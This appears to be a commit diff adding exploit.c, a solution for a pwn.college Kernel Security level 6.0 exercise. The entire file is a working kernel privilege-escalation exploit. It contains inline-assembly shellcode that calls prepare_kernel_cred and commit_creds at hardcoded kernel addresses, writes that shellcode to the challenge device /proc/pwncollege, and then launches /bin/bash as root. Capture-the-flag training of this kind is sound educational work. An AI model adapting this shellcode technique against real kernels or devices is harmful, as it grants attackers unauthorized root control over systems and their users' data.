Added Level 3.0 ~ 8.1 of KernelSecurity in PwnCollege

PwnCollege/KernelSecurity/Level6.0/exploit.c

@@ -0,0 +1,24 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+__attribute__((naked))
+void shellcode() {
+    asm volatile(
+        "xor %rdi, %rdi\n"
+        "movabs $0xffffffff81089660, %rsi\n"
+        "callq *%rsi\n" // prepare_kernel_cred
+        "movq %rax, %rdi\n"
+        "movabs $0xffffffff81089310, %rsi\n"
+        "callq *%rsi\n" // commit_creds
+        "retq\n"
+    );
+}
+
+int main() {
+    int fd = open("/proc/pwncollege", O_WRONLY);
+    write(fd, (void *)shellcode, 0x1F);
+    execve("/bin/bash", NULL, NULL);
+}